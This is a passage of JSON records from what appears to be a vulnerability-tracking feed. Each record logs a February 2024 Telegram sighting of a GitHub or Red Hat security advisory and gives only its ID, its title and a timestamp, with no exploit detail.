"https://t.me/ctinow/188279", "content": "https://ift.tt/N6WlXzn\nRHSA-2024:0879: Moderate: java-1.8.0-ibm security update", "creation_timestamp": "2024-02-20T10:16:18.000000Z"}, {"uuid": "ec8fc512-9e2f-4fe8-af00-2c71fd6e1dd2", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-RC6H-QWJ9-2C53", "type": "seen", "source": "https://t.me/ctinow/192173", "content": "https://ift.tt/2NyFdva\n[GHSA-rc6h-qwj9-2c53] Apache DolphinScheduler vulnerable to arbitrary JavaScript execution as root for authenticated users", "creation_timestamp": "2024-02-23T21:17:20.000000Z"}, {"uuid": "eddb7742-fd92-45dc-a5dc-c6bf912b7226", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-VQXQ-HVXW-9MV9", "type": "seen", "source": "https://t.me/ctinow/192522", "content": "https://ift.tt/35bUWzA\nCVE-2024-24570 | Statamic CMS up to 3.4.16/4.45.x cross site scripting (GHSA-vqxq-hvxw-9mv9)", "creation_timestamp": "2024-02-24T10:11:19.000000Z"}, {"uuid": "6f4f3251-bc91-408c-bfd9-a7b0c96897e4", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-XW73-RW38-6VJC", "type": "seen", "source": "https://t.me/ctinow/192521", "content": "https://ift.tt/MwRJ8PT\nCVE-2024-24557 | Moby up to 24.0.8/25.0.1 /build origin validation (GHSA-xw73-rw38-6vjc)", "creation_timestamp": "2024-02-24T10:11:18.000000Z"}, {"uuid": "fb26687e-4822-4af5-afe7-535dc5dfdfb5", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-X4HH-FRX8-98R5", "type": "seen", "source": "https://t.me/ctinow/192508", "content": "https://ift.tt/JAFMHvj\nCVE-2024-24752 | brefphp bref up to 2.1.12 Multipart Request /tmp RequestHandlerInterface resource consumption (GHSA-x4hh-frx8-98r5)", "creation_timestamp": "2024-02-24T09:41:13.000000Z"}, {"uuid": "0723caf2-6801-4526-bc65-8bf6c39aedaf", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2015:1194", "type": "seen", "source": "https://t.me/ctinow/192256", "content": "https://ift.tt/94fS7xQ\nCVE-2015-3166 | PostgreSQL up to 9.0.19/9.1.15/9.2.10/9.3.6/9.4.1 snprintf memory corruption (RHSA-2015:1194 / Nessus ID 84464)", "creation_timestamp": "2024-02-23T22:51:18.000000Z"}, {"uuid": "f3fb4f2d-c61d-44d5-87ba-93ecca9ffb81", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2016:2067", "type": "seen", "source": "https://t.me/ctinow/192287", "content": "https://ift.tt/jHpQZnA\nCVE-2016-5194 | Google Chrome up to 54.0 Product Security memory corruption (RHSA-2016:2067 / Nessus ID 94103)", "creation_timestamp": "2024-02-23T23:21:52.000000Z"}, {"uuid": "50f01e2a-719d-4d34-95ba-fb94670c16c2", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-3787-6PRV-H9W3", "type": "seen", "source": "https://t.me/ctinow/186520", "content": "https://ift.tt/nFXlASr\n[GHSA-3787-6prv-h9w3] Undici proxy-authorization header not cleared on cross-origin redirect in fetch", "creation_timestamp": "2024-02-16T17:12:46.000000Z"}, {"uuid": "2443308c-3c1c-437f-ac9f-c1c053872464", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-7J7M-V7M3-JQM7", "type": "seen", "source": "https://t.me/ctinow/186519", "content": "https://ift.tt/FOMnG78\n[GHSA-7j7m-v7m3-jqm7] Scrapy decompression bomb vulnerability", "creation_timestamp": "2024-02-16T17:12:45.000000Z"}, {"uuid": "757d2ea3-72a9-445b-8e39-c970f3d7250d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-9F24-JQHM-JFCW", "type": "seen", "source": "https://t.me/ctinow/186514", "content": "https://ift.tt/9STIw1X\n[GHSA-9f24-jqhm-jfcw] fetch(url) leads to a memory leak in undici", "creation_timestamp": "2024-02-16T17:07:46.000000Z"}, {"uuid": "79678334-c93e-4449-bbda-1de9df6a666a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-4C2G-HX49-7H25", "type": "seen", "source": "https://t.me/ctinow/186434", "content": "https://ift.tt/Yn5lrpb\nCVE-2024-23339 | elijahharry hoolock 2.0.0/2.1.0/2.2.0 prototype pollution (GHSA-4c2g-hx49-7h25)", "creation_timestamp": "2024-02-16T15:21:48.000000Z"}, {"uuid": "8c0c7a1f-275a-4c26-95d2-b0696b86d535", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:0857", "type": "seen", "source": "https://t.me/ctinow/187417", "content": "https://ift.tt/Y0owI8f\nRHSA-2024:0857: Important: python-pillow security update", "creation_timestamp": "2024-02-19T02:16:40.000000Z"}, {"uuid": "cb0cd253-a09f-4c9d-b903-7b03953c13fc", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-CCGV-VJ62-XF9H", "type": "seen", "source": "https://t.me/ctinow/192064", "content": "https://ift.tt/nmFNyia\n[GHSA-ccgv-vj62-xf9h] Spring Web vulnerable to Open Redirect or Server Side Request Forgery", "creation_timestamp": "2024-02-23T19:16:49.000000Z"}, {"uuid": "309d13ba-7051-45f2-9d01-b85cb340cf79", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-WFM3-GQ9H-MRJM", "type": "seen", "source": "https://t.me/ctinow/192039", "content": "https://ift.tt/Z0kwIvt\n[GHSA-wfm3-gq9h-mrjm] Appwrite Directory Traversal vulnerability", "creation_timestamp": "2024-02-23T18:52:06.000000Z"}, {"uuid": "8d70bcb4-9e16-4618-a972-665bfd63ca01", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-3867-JC5C-66QF", "type": "seen", "source": "https://t.me/ctinow/182584", "content": "https://ift.tt/9ap3tes\nCVE-2024-22407 | Shopware up to 6.5.7.3 access control (GHSA-3867-jc5c-66qf)", "creation_timestamp": "2024-02-10T15:46:15.000000Z"}, {"uuid": "cc22056b-bde6-47b2-a0de-f0a28d718d9c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-JP2C-MJ65-QPMW", "type": "seen", "source": "https://t.me/ctinow/182583", "content": "https://ift.tt/41Y2Fsm\nCVE-2023-48926 | Advanced Loyalty Program up to 2.3.3 on PrestaShop Order Status access control (GHSA-jp2c-mj65-qpmw)", "creation_timestamp": "2024-02-10T15:46:14.000000Z"}, {"uuid": "b5f4813f-b5fa-475f-be86-3bc01b538295", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-2Q6J-GQC4-4GW3", "type": "seen", "source": "https://t.me/ctinow/182556", "content": "https://ift.tt/9U6awQM\nCVE-2022-31021 | Hyperledger ursa up to 0.3.7 unknown vulnerability (GHSA-2q6j-gqc4-4gw3)", "creation_timestamp": "2024-02-10T14:46:08.000000Z"}, {"uuid": "c2c0cde8-29fa-4843-af3a-1efcebdd687f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-XRJ7-X7GP-WWQR", "type": "seen", "source": "https://t.me/ctinow/182283", "content": "https://ift.tt/HE0Yfgj\n[GHSA-xrj7-x7gp-wwqr] Apache Solr's Streaming Expressions allow users to extract data from other Solr Clouds", "creation_timestamp": "2024-02-09T22:07:05.000000Z"}, {"uuid": "ad620c3c-98a2-4dac-b8ca-ca16b1e9acef", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:0876", "type": "seen", "source": "https://t.me/ctinow/188137", "content": "https://ift.tt/dFt6yrb\nRHSA-2024:0876: Important: kpatch-patch security update", "creation_timestamp": "2024-02-20T06:16:41.000000Z"}, {"uuid": "63c82484-7006-43cf-8444-59f45f2db340", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:0866", "type": "seen", "source": "https://t.me/ctinow/187876", "content": "https://ift.tt/b6KMZ7h\nRHSA-2024:0866: Moderate: java-1.8.0-ibm security update", "creation_timestamp": "2024-02-19T19:16:49.000000Z"}, {"uuid": "0327e382-ae6d-43e7-8e67-e6db7009c232", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:0855", "type": "seen", "source": "https://t.me/ctinow/187418", "content": "https://ift.tt/fpcALza\nRHSA-2024:0855: Moderate: Red Hat Ansible Automation Platform 2.4 Product Security and Bug Fix Update", "creation_timestamp": "2024-02-19T02:16:41.000000Z"}, {"uuid": "66a6b269-f0f0-45c8-954e-21a362b5cb3c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-32Q7-GV7F-4CG5", "type": "seen", "source": "https://t.me/ctinow/184182", "content": "https://ift.tt/hrVD38H\n[GHSA-32q7-gv7f-4cg5] Duplicate Advisory: Microsoft Security Advisory CVE-2024-21386: .NET Denial of Service Vulnerability", "creation_timestamp": "2024-02-13T20:56:49.000000Z"}, {"uuid": "ea1ab656-112c-4b56-9bab-44029a1c3229", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:0806", "type": "seen", "source": "https://t.me/ctinow/184127", "content": "https://ift.tt/X2lV3mk\nRHSA-2024:0806: Important: dotnet7.0 security update", "creation_timestamp": "2024-02-13T20:16:46.000000Z"}, {"uuid": "66643dd8-2e2c-4d01-abb6-5bbc411626dd", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:0807", "type": "seen", "source": "https://t.me/ctinow/184126", "content": "https://ift.tt/eprc8WO\nRHSA-2024:0807: Important: dotnet6.0 security update", "creation_timestamp": "2024-02-13T20:16:45.000000Z"}, {"uuid": "878929d1-d853-4d39-957c-b8ab9b6d41c1", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:0808", "type": "seen", "source": "https://t.me/ctinow/184125", "content": "https://ift.tt/C1gUx8n\nRHSA-2024:0808: Important: dotnet6.0 security update", "creation_timestamp": "2024-02-13T20:16:43.000000Z"}, {"uuid": "2a451c80-f1aa-49eb-a1d6-565194785772", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-W6X2-JG8H-P6MP", "type": "seen", "source": "https://t.me/ctinow/184122", "content": "https://ift.tt/OZ4WaCh\n[GHSA-w6x2-jg8h-p6mp] Path Traversal in TYPO3 File Abstraction Layer Storages", "creation_timestamp": "2024-02-13T20:16:40.000000Z"}, {"uuid": "bf1a244e-af1f-462d-bffc-d16865b9f00f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:0801", "type": "seen", "source": "https://t.me/ctinow/184002", "content": "https://ift.tt/x46839M\nRHSA-2024:0801: Important: Red Hat Single Sign-On 7.6.7 for OpenShift image enhancement update", "creation_timestamp": "2024-02-13T18:16:51.000000Z"}, {"uuid": "b3439e59-c690-464d-8986-cd624b08b7bf", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:0804", "type": "seen", "source": "https://t.me/ctinow/184001", "content": "https://ift.tt/bDu1xF5\nRHSA-2024:0804: Important: Red Hat Single Sign-On 7.6.7 security update", "creation_timestamp": "2024-02-13T18:16:50.000000Z"}, {"uuid": "883bc23a-9531-45e0-9623-6ec76e899c10", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-4576-PGH2-G34J", "type": "seen", "source": "https://t.me/ctinow/184000", "content": "https://ift.tt/RCcjyf7\n[GHSA-4576-pgh2-g34j] derhansen/sf_event_mgt vulnerable to Broken Access Control in Backend Module", "creation_timestamp": "2024-02-13T18:16:49.000000Z"}, {"uuid": "ff149819-fb7f-478d-84af-61a93a84a07a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-38R2-5695-334W", "type": "seen", "source": "https://t.me/ctinow/183999", "content": "https://ift.tt/P0wqNYc\n[GHSA-38r2-5695-334w] TYPO3 Backend Forms vulnerable to Information Disclosure of Hashed Passwords", "creation_timestamp": "2024-02-13T18:11:34.000000Z"}, {"uuid": "7a50fc0d-aac8-4f03-8c51-4f32971aa1a2", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-9VGQ-W5PV-V77Q", "type": "seen", "source": "https://t.me/ctinow/181003", "content": "https://ift.tt/IfLQkom\n[GHSA-9vgq-w5pv-v77q] Liferay Portal stored cross-site scripting (XSS) vulnerability", "creation_timestamp": "2024-02-07T22:37:06.000000Z"}, {"uuid": "4b1f9cea-1671-48c7-9ca7-5638f2ac8785", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:0702", "type": "seen", "source": "https://t.me/ctinow/179903", "content": "https://ift.tt/TqYmDAK\nRHSA-2024:0702: Important: gimp security update", "creation_timestamp": "2024-02-06T11:16:40.000000Z"}, {"uuid": "895158db-c5b4-4989-af02-fcdbfa82d491", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-QF9M-VFGH-M389", "type": "seen", "source": "https://t.me/ctinow/179404", "content": "https://ift.tt/fvpmIlW\n[GHSA-qf9m-vfgh-m389] FastAPI Content-Type Header ReDoS", "creation_timestamp": "2024-02-05T18:16:44.000000Z"}, {"uuid": "2b716f42-f7a9-4f87-9279-9568d5b71a61", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-H2RQ-QHR7-53GM", "type": "seen", "source": "https://t.me/ctinow/180266", "content": "https://ift.tt/fG27teF\n[GHSA-h2rq-qhr7-53gm] Apache Sling Servlets Resolver executes malicious code via path traversal", "creation_timestamp": "2024-02-06T19:36:26.000000Z"}, {"uuid": "8049b7ba-ded7-44b9-be1f-1d1ce1739c17", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-X3V6-R479-M4XV", "type": "seen", "source": "https://t.me/ctinow/180185", "content": "https://ift.tt/lxCHWRB\nCVE-2024-22409 | DataHub up to 0.12.0 default permission (GHSA-x3v6-r479-m4xv)", "creation_timestamp": "2024-02-06T18:12:10.000000Z"}, {"uuid": "8b80a50f-5a32-4737-a976-4f690e2ed975", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-3RFR-MPFJ-2JWQ", "type": "seen", "source": "https://t.me/ctinow/180921", "content": "https://ift.tt/OEpUcMk\n[GHSA-3rfr-mpfj-2jwq] Pimcore Admin Classic Bundle permissions are not getting checked when working with tags", "creation_timestamp": "2024-02-07T19:37:11.000000Z"}, {"uuid": "df0605d4-a170-4663-85a3-cb1a50887495", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-3XF8-G8GR-G7RH", "type": "seen", "source": "https://t.me/ctinow/180920", "content": "https://ift.tt/KNZbA5c\n[GHSA-3xf8-g8gr-g7rh] Graylog session fixation vulnerability through cookie injection", "creation_timestamp": "2024-02-07T19:37:10.000000Z"}, {"uuid": "afe963b3-ca86-46fb-95c6-d938025f8801", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-P6GG-5HF4-4RGJ", "type": "seen", "source": "https://t.me/ctinow/180919", "content": "https://ift.tt/BGWiV73\n[GHSA-p6gg-5hf4-4rgj] Graylog vulnerable to instantiation of arbitrary classes triggered by API request", "creation_timestamp": "2024-02-07T19:37:09.000000Z"}, {"uuid": "f9108aaa-64ab-4119-963a-fdf62510e4f5", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-C57V-4VG5-CM2X", "type": "seen", "source": "https://t.me/ctinow/180918", "content": "https://ift.tt/rG0h6lQ\n[GHSA-c57v-4vg5-cm2x] Apache Pulsar SASL Authentication Provider observable timing discrepancy vulnerability", "creation_timestamp": "2024-02-07T19:37:08.000000Z"}, {"uuid": "b0ea010e-352f-4a0b-ac9f-a7635a621f01", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:0642", "type": "seen", "source": "https://t.me/ctinow/180906", "content": "https://ift.tt/bSHLsGe\nRHSA-2024:0642: Critical: OpenShift Container Platform 4.14.11 bug fix and security update", "creation_timestamp": "2024-02-07T19:21:39.000000Z"}, {"uuid": "54509c9e-da58-45ad-bfd7-b41568b6718e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-MW2C-VX6J-MG76", "type": "seen", "source": "https://t.me/ctinow/180899", "content": "https://ift.tt/n8tiKrm\n[GHSA-mw2c-vx6j-mg76] CKEditor4 Cross-site Scripting vulnerability in samples with enabled the preview feature", "creation_timestamp": "2024-02-07T18:46:56.000000Z"}, {"uuid": "95ca8bcb-fed1-468d-9443-8df60317a4e8", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-FQ6H-4G8V-QQVM", "type": "seen", "source": "https://t.me/ctinow/180897", "content": "https://ift.tt/VKMRNUe\n[GHSA-fq6h-4g8v-qqvm] CKEditor4 Cross-site Scripting vulnerability caused by incorrect CDATA detection", "creation_timestamp": "2024-02-07T18:46:54.000000Z"}, {"uuid": "09f9985f-6974-463a-b296-104bb1bb84d8", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-WH5W-82F3-WRXH", "type": "seen", "source": "https://t.me/ctinow/180898", "content": "https://ift.tt/HRjYyzu\n[GHSA-wh5w-82f3-wrxh] CKEditor cross-site scripting vulnerability in AJAX sample", "creation_timestamp": "2024-02-07T18:46:55.000000Z"}, {"uuid": "3fc0a8dc-31e5-4f50-a03c-0858d153d6a1", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-XXJ9-F6RV-M3X4", "type": "seen", "source": "https://t.me/ctinow/180896", "content": "https://ift.tt/2YpPNVz\n[GHSA-xxj9-f6rv-m3x4] Django denial-of-service attack in the intcomma template filter", "creation_timestamp": "2024-02-07T18:46:53.000000Z"}, {"uuid": "36d24f4b-60fb-417a-a8a1-f646c2e1c9fd", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-52XQ-J7V9-V4V2", "type": "seen", "source": "https://t.me/ctinow/180889", "content": "https://ift.tt/N8AzvL1\n[GHSA-52xq-j7v9-v4v2] Vyper array negative index vulnerability", "creation_timestamp": "2024-02-07T18:36:50.000000Z"}, {"uuid": "c0cb9a59-dec1-4bd4-9290-fcad769c42c0", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-R3JC-3QMM-W3PW", "type": "seen", "source": "https://t.me/ctinow/180888", "content": "https://ift.tt/a5MWgNz\n[GHSA-r3jc-3qmm-w3pw] SQLAlchemyDA unauthenticated arbitrary SQL query execution", "creation_timestamp": "2024-02-07T18:36:49.000000Z"}, {"uuid": "df517c20-6a62-4460-8996-789df353a86d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-HC6X-CW6P-GJ7H", "type": "seen", "source": "https://t.me/ctinow/179869", "content": "https://ift.tt/DWpjE0q\nCVE-2023-45235 | TianoCore EDK2 stable202308 DHCPv6 Proxy Advertise Message buffer overflow (GHSA-hc6x-cw6p-gj7h)", "creation_timestamp": "2024-02-06T10:11:15.000000Z"}, {"uuid": "2642dd44-8799-44c5-9ca2-aea7cd5eeac0", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-HC6X-CW6P-GJ7H", "type": "seen", "source": "https://t.me/ctinow/179868", "content": "https://ift.tt/Lh0ties\nCVE-2023-45234 | TianoCore EDK2 stable202308 DHCPv6 Advertise Message buffer overflow (GHSA-hc6x-cw6p-gj7h)", "creation_timestamp": "2024-02-06T10:11:14.000000Z"}, {"uuid": "e949d1d8-92a2-4a20-afd0-e5d76b2bddbe", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:0533", "type": "seen", "source": "https://t.me/ctinow/179831", "content": "https://ift.tt/VDi7qsk\nCVE-2024-0553 | GnuTLS up to 3.8.2 RSA-PSK ClientKeyExchange information exposure (RHSA-2024:0533)", "creation_timestamp": "2024-02-06T08:41:13.000000Z"}, {"uuid": "e3b43d6e-5dc2-4864-997f-6f4ec5785bd6", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:0714", "type": "seen", "source": "https://t.me/ctinow/180325", "content": "https://ift.tt/jwTSxJh\nRHSA-2024:0714: Moderate: Red Hat JBoss Enterprise Application Platform 7.4.15 Security update", "creation_timestamp": "2024-02-06T21:16:57.000000Z"}, {"uuid": "171c4712-c004-43f9-83da-0c908d887ac7", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:0712", "type": "seen", "source": "https://t.me/ctinow/180326", "content": "https://ift.tt/8YsqESM\nRHSA-2024:0712: Moderate: Red Hat JBoss Enterprise Application Platform 7.4.15 security update", "creation_timestamp": "2024-02-06T21:16:59.000000Z"}, {"uuid": "1a841150-068e-4155-804d-96ddccab07b7", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:0820", "type": "seen", "source": "https://t.me/ctinow/184975", "content": "https://ift.tt/ufcYBDx\nRHSA-2024:0820: Critical: Red Hat Advanced Cluster Management 2.8.5 security and bug fix container updates", "creation_timestamp": "2024-02-14T20:17:07.000000Z"}, {"uuid": "a2db1c54-ed17-4fc2-af96-238a49ceca54", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2019:4326", "type": "seen", "source": "https://t.me/ctinow/183857", "content": "https://ift.tt/LZDyBtA\nCVE-2019-18397 | GNU FriBidi up to 1.0.7 lib/fribidi-bidi.c fribidi_get_par_embedding_levels_ex buffer overflow (RHSA-2019:4326)", "creation_timestamp": "2024-02-13T15:06:48.000000Z"}, {"uuid": "c9cef816-a544-471d-878d-d74862af0352", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-GFQF-9W98-7JMX", "type": "seen", "source": "https://t.me/ctinow/180265", "content": "https://ift.tt/iEZHcKB\n[GHSA-gfqf-9w98-7jmx] Stimulsoft Dashboard.JS directory traversal vulnerability", "creation_timestamp": "2024-02-06T19:36:25.000000Z"}, {"uuid": "b7032137-0d96-40d1-9cf3-57d119e15d95", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-HC6X-CW6P-GJ7H", "type": "seen", "source": "https://t.me/ctinow/179871", "content": "https://ift.tt/o0iAm3R\nCVE-2023-45237 | TianoCore EDK2 stable202308 TCP Initial Sequence Number weak prng (GHSA-hc6x-cw6p-gj7h)", "creation_timestamp": "2024-02-06T10:11:18.000000Z"}, {"uuid": "d40cf653-5c48-48b3-bd70-d9d445b640e2", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:0705", "type": "seen", "source": "https://t.me/ctinow/180046", "content": "https://ift.tt/1pNkuqY\nRHSA-2024:0705: Moderate: Red Hat AMQ Broker 7.11.6 release and security update", "creation_timestamp": "2024-02-06T15:17:17.000000Z"}, {"uuid": "dfb1773e-8668-4a30-976e-c2179865f6c1", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-6749-M5CP-6CG7", "type": "seen", "source": "https://t.me/ctinow/193759", "content": "https://ift.tt/ky6zM5w\n[GHSA-6749-m5cp-6cg7] Cross-site Scripting in MLFlow", "creation_timestamp": "2024-02-26T21:17:18.000000Z"}, {"uuid": "61162484-0196-4d8c-ad41-419f616ebe33", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-57F2-8P89-66X6", "type": "seen", "source": "https://t.me/ctinow/193619", "content": "https://ift.tt/uHltLe7\n[GHSA-57f2-8p89-66x6] Kirby vulnerable to self cross-site scripting (self-XSS) in the URL field", "creation_timestamp": "2024-02-26T18:26:44.000000Z"}, {"uuid": "292c7307-1b8c-4d50-898a-59d174623f7f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:0992", "type": "seen", "source": "https://t.me/ctinow/193605", "content": "https://ift.tt/Z7h1nAJ\nRHSA-2024:0992: Important: rh-postgresql10-postgresql security update", "creation_timestamp": "2024-02-26T18:16:48.000000Z"}, {"uuid": "f6c84bd1-d873-4229-ab41-e85e082f76b7", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-XRVH-RVC4-5M43", "type": "seen", "source": "https://t.me/ctinow/193560", "content": "https://ift.tt/0a6Zyi4\n[GHSA-xrvh-rvc4-5m43] Kirby vulnerable to unrestricted file upload of user avatar images", "creation_timestamp": "2024-02-26T17:47:04.000000Z"}, {"uuid": 